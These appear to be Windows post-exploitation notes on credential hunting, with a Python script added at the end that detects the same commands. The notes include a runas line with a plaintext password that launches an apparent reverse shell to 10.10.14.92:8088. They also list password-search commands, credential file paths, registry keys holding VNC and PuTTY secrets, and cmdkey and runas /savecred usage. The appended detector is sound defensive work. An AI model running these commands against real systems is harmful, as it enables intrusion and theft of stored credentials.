switch users using:
\runas.exe c.bum Tikkycoll_431012284 powershell -r 10.10.14.92:8088
File Enumeration:
File check:
dir /b /a /s C:\ > dirs.txt
- list all dirs and files
type dirs.txt | findstr /i passw
- find docs with passwords
Potentially attractive file types:
certificates:
gpg, pgp, p12, der, csr, cer
keys:
pem, ppk, id_rsa, id_dsa
backup files:
bak, backup, log
Executable:
bat, cmd, vbs
Config:
conf, cnf, ini, xml
VPN/ RDP:
ovpn, vnc, ssh, rdg (mRemoteNG), ftp, .git, .env (docker)
Potentially attractive files:
unattend.xml
sysprep.inf
sysprep.xml
VARIABLES.dat
setupinfo
setupinfo.bak
web.config
Sitelist.xml
.aws/credentials
.azure/accesstokens.json
.azure/azureprofile.json
gcloud/credentials.db
gcloud/legacy_credentials
gcloud/access_tokens.db
Registry Enumeration:
Registry search:
reg query HKCU /f WORD /t REG_SZ /s
reg query HKLM /f WORD /t REG_SZ /s
Potentially interesting Registry:
Run with 'reg query "REG"'
HKCU\Software\ORL\WinVNC3\Password
HKCU\Software\TightVNC\Server
HKCU\Software\SimonTatham\PuTTY\Sessions
HKCU\Software\SimonTatham\PuTTY\Sessions\local
HKCU\Software\OpenSSH\Agent\Keys
HKCU\Software\
Credential Manager:
cmdkey /list
runas /savecred /user:SAVED_USER powershell.exe
cms.ps1; enum-creds
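
Detection view of the commands above, as an added example that is not part of the original notes: it matches process-creation command lines against the findstr, reg query, cmdkey and runas usage listed here and flags accounts that trigger several distinct rules. The event fields, account names and threshold are assumptions, and the sample events are constructed.

```python
import re
from collections import defaultdict

# Rules derived from the commands in these notes. dir and type are cmd.exe
# built-ins and create no process of their own, so the rules key on the
# executables that do: findstr.exe, reg.exe, cmdkey.exe and runas.exe.
RULES = {
    "findstr-password-hunt": r'\bfindstr(?:\.exe)?"?\s.*passw',
    "registry-string-search": r'\breg(?:\.exe)?"?\s+query\s+"?(?:HKLM|HKCU)\b(?=.*\s/f\s)(?=.*\s/s\b)',
    "stored-credential-keys": r'\breg(?:\.exe)?"?\s+query\b.*(?:WinVNC3|TightVNC|SimonTatham\\PuTTY|OpenSSH\\Agent\\Keys)',
    "credman-listing": r'\bcmdkey(?:\.exe)?"?\s+/list\b',
    "runas-savecred": r'\brunas(?:\.exe)?"?\s.*/savecred\b',
}
COMPILED = {name: re.compile(rx, re.I) for name, rx in RULES.items()}

def match_rules(command_line):
    """Return the names of all rules the command line triggers."""
    return [name for name, rx in COMPILED.items() if rx.search(command_line)]

def flag_users(events, threshold=2):
    """Map user -> sorted rule names, for users hitting >= threshold distinct rules."""
    hits = defaultdict(set)
    for ev in events:
        hits[ev["user"]].update(match_rules(ev["cmd"]))
    return {u: sorted(r) for u, r in hits.items() if len(r) >= threshold}

# Constructed sample events (user and command line only), not real logs.
SAMPLE_EVENTS = [
    {"user": "LAB\\svc_web", "cmd": "findstr /i passw"},
    {"user": "LAB\\svc_web", "cmd": "reg query HKLM /f password /t REG_SZ /s"},
    {"user": "LAB\\svc_web", "cmd": '"C:\\Windows\\System32\\reg.exe" query "HKCU\\Software\\SimonTatham\\PuTTY\\Sessions"'},
    {"user": "LAB\\svc_web", "cmd": "cmdkey /list"},
    {"user": "LAB\\svc_web", "cmd": "runas /savecred /user:SAVED_USER powershell.exe"},
    {"user": "LAB\\alice", "cmd": "reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion /v ProgramFilesDir"},
    {"user": "LAB\\alice", "cmd": "findstr /i error app.log"},
    {"user": "LAB\\bob", "cmd": "cmdkey /list"},
]

if __name__ == "__main__":
    for user, rules in flag_users(SAMPLE_EVENTS).items():
        print(user, rules)
```

A single `cmdkey /list` or `reg query` is routine administration; the signal is several of these rules firing for one account, which is why the function counts distinct rules per user.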